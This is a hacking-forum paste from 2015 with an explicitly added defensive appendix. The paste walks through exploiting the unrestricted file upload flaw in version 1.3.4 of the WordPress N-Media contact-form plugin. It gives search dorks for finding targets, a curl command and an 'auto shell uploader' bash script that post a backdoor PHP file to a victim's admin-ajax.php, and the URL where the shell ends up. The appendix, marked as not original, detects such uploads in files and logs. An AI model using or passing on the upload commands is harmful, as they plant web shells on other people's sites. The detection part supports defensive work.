r00tNEPAL

nulled.io ::: Wordpress Vuln Description

Aug 1st, 2015
1. First Find Vulnerable Sites Using Dorks
--------------------------------------------------------------------------------
Code:
index of website-contact-form-with-file-upload
index of /uploads/contact_files/
inurl:"/uploads/contact_files/"
--------------------------------------------------------------------------------
OR/THEN Add This To WP Site
--------------------------------------------------------------------------------
Code:
/wp-admin/admin-ajax.php
--------------------------------------------------------------------------------
SCRIPTS::
--------------------------------------------------------------------------------

There Are Two Methods,
==> Manually With Curl
--------------------------------------------------------------------------------
Code:
curl -k -X POST -F "action=upload" -F "Filedata=@./backdoor.php" -F "action=nm_webcontact_upload_file" http://www.VICTIM.com/wp-admin/admin-ajax.php
--------------------------------------------------------------------------------

==> With Bash Script :
--------------------------------------------------------------------------------

Code:
#!/bin/bash
#
# Exploit Title : Wordpress N-Media Website Contact Form with File Upload 1.3.4
# Google Dork : inurl:"/uploads/contact_files/"
# Exploit Author : Claudio Viviani
# Vulnerability discovered by : Claudio Viviani
# Script Written by : F17.c0de
# Software link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip
# Version : 1.3.4
# Tested on : Kali Linux 1.1.0a / Curl 7.26.0
# Info: The "upload_file()" ajax function is affected by an unrestricted file upload vulnerability
# Response : {"status":"uploaded","filename":"YOURSHELL"}
# Shell location http://VICTIM/wp-content/uploads/contact_files/YOURSHELL

echo '
+------+
| |
| Wordpress N-Media Website Contact Form with File Upload 1.3.4 |
| |
+------+
| |
| Script by : F17.c0de |
| Vuln Discovered by : Claudio Viviani |
| Date : 15.04.2015 |
| Google Dork : inurl:"/uploads/contact_files/" |
| Vulnerability : "upload_file()" on admin-ajax.php |
| Description : Auto shell uploader |
| |
+------+
| No System is Safe |
+------+
'

echo -n -e "Path of your shell: "
read bd
echo -n -e "Victim address [ex: http://www.victim.com]: "
read st
sleep 1
echo
echo "Uploading Shell. . ."
echo

curl -k -X POST -F "action=upload" -F "Filedata=@./$bd" -F "action=nm_webcontact_upload_file" $st/wp-admin/admin-ajax.php

echo
echo
echo "Job Finished"
echo
--------------------------------------------------------------------------------

==> If everything succeeded, you will see this response after running curl.
--------------------------------------------------------------------------------
Code:
Response: {"status":"uploaded","filename":"1427927588-backdoor.php"}
--------------------------------------------------------------------------------
==> Location:
--------------------------------------------------------------------------------
Code:
http://VICTIM/wp-content/uploads/contact_files/1427927588-backdoor.php
--------------------------------------------------------------------------------
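
The upload directory and file-naming pattern shown above give a site owner two things to check on a server that runs or ran this plugin version: script files sitting in wp-content/uploads/contact_files/, and access-log requests for them. The following is an added example, not part of the original paste; the function names, the WordPress root argument and the common/combined access-log format are assumptions.

```shell
#!/bin/sh
# Added defensive example, not from the original paste.
# Assumptions: uploads land in <wp_root>/wp-content/uploads/contact_files/
# (the path shown in the paste) and the access log is in common/combined format.

# Extensions that PHP handlers commonly execute; adjust to your server config.
SCRIPT_EXT_RE='\.(php[0-9]?|phtml|phar|pht)$'

# List files in the plugin's upload directory that carry a script extension.
find_script_uploads() {
    dir="$1/wp-content/uploads/contact_files"
    [ -d "$dir" ] || return 0
    find "$dir" -type f | grep -Ei "$SCRIPT_EXT_RE" | sort
}

# Report requests for script files under contact_files/.
# Output: <tag> <client> <status> <path>, where tag is "correlated" if the same
# client POSTed to admin-ajax.php earlier in the log. Such POSTs are normal
# WordPress traffic, so the tag only helps order triage.
flag_contact_file_scripts() {
    awk '
        $6 == "\"POST" && $7 ~ /\/wp-admin\/admin-ajax\.php/ { posted[$1] = 1; next }
        tolower($7) ~ /\/uploads\/contact_files\/[^?]*\.(php[0-9]?|phtml|phar|pht)([?]|$)/ {
            tag = ($1 in posted) ? "correlated" : "uncorrelated"
            print tag, $1, $9, $7
        }
    ' "$1"
}
```

The directory should hold only form attachments, so any hit from either function warrants inspecting the file. Disabling script execution for the uploads directory in the web server configuration removes the impact of a stray upload.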